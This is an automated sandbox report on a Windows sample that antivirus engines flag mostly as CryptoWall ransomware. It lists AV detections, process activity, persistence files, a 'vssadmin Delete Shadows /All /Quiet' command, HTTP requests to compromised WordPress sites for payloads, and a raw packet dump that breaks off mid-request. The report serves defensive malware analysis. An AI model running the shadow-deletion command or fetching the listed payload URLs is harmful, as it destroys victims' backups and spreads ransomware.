Analysis Date2014-11-09 00:35:54
MD523a6a98a446c0981e4021867b235bd25
SHA1c4f861191578ca4c4f8f0f53ea6a79c25be6b67a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
AV360 SafeTrojan.GenericKD.1961069
AVAd-AwareTrojan.GenericKD.1961069
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.LKCO-1204
AVAvira (antivir)TR/Andromeda.31018227
AVBullGuardTrojan.GenericKD.1961069
AVCA (E-Trust Ino)Win32/Inject.NSaefVC
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Win32.FileCoder
AVEset (nod32)Win32/Filecoder.CO
AVFortinetno_virus
AVFrisk (f-prot)W32/Trojan3.LYL
AVF-Secureno_virus
AVGrisoft (avg)Inject2.BDKL
AVIkarusTrojan-Ransom.CryptoWall
AVK7no_virus
AVKasperskyTrojan-Dropper.Win32.Injector.kvgh
AVMalwareBytesTrojan.CryptoWall
AVMcafeeno_virus
AVMicrosoft Security EssentialsRansom:Win32/Crowti.A
AVMicroWorld (escan)no_virus
AVNormanTrojan.GenericKD.1961069
AVRisingno_virus
AVSophosTroj/Ransom-ANL
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\a1a0cab\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.grekiskaforeningen.com
Winsock DNSbethpeters.net
Winsock DNSdesignbytheme.com
Winsock DNSblog.marianisel.com
Winsock DNSfreekidsvideos.net
Winsock DNSvirachey.com
Winsock DNSdanielferris.com.au
Winsock DNSclerktogovernors.co.uk
Winsock DNSbball-keyman.net
Winsock DNSstpaulmaybee.org

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSbethpeters.net
Type: A
184.154.193.178
DNSdanielferris.com.au
Type: A
117.55.227.125
DNSstpaulmaybee.org
Type: A
198.23.48.88
DNSbball-keyman.net
Type: A
203.189.105.172
DNSvirachey.com
Type: A
198.23.48.160
DNSclerktogovernors.co.uk
Type: A
94.136.40.103
DNSfreekidsvideos.net
Type: A
192.252.214.226
DNSblog.marianisel.com
Type: A
70.167.156.65
DNSdesignbytheme.com
Type: A
174.136.39.160
DNSwww.grekiskaforeningen.com
Type: A
193.12.177.238
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 184.154.193.178:80
Flows TCP192.168.1.1:1032 ➝ 117.55.227.125:80
Flows TCP192.168.1.1:1033 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1034 ➝ 203.189.105.172:80
Flows TCP192.168.1.1:1035 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1036 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1037 ➝ 192.252.214.226:80
Flows TCP192.168.1.1:1038 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1039 ➝ 174.136.39.160:80
Flows TCP192.168.1.1:1040 ➝ 193.12.177.238:80
Flows TCP192.168.1.1:1041 ➝ 184.154.193.178:80
Flows TCP192.168.1.1:1042 ➝ 117.55.227.125:80
Flows TCP192.168.1.1:1043 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1044 ➝ 203.189.105.172:80
Flows TCP192.168.1.1:1045 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1046 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1047 ➝ 192.252.214.226:80
Flows TCP192.168.1.1:1048 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1049 ➝ 174.136.39.160:80
Flows TCP192.168.1.1:1050 ➝ 193.12.177.238:80
Flows TCP192.168.1.1:1051 ➝ 184.154.193.178:80
Flows TCP192.168.1.1:1052 ➝ 117.55.227.125:80
Flows TCP192.168.1.1:1053 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1054 ➝ 203.189.105.172:80
Flows TCP192.168.1.1:1055 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1056 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1057 ➝ 192.252.214.226:80
Flows TCP192.168.1.1:1058 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1059 ➝ 174.136.39.160:80
Flows TCP192.168.1.1:1060 ➝ 193.12.177.238:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a61 6368650d 0a0d0a0d 0a         ...ache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
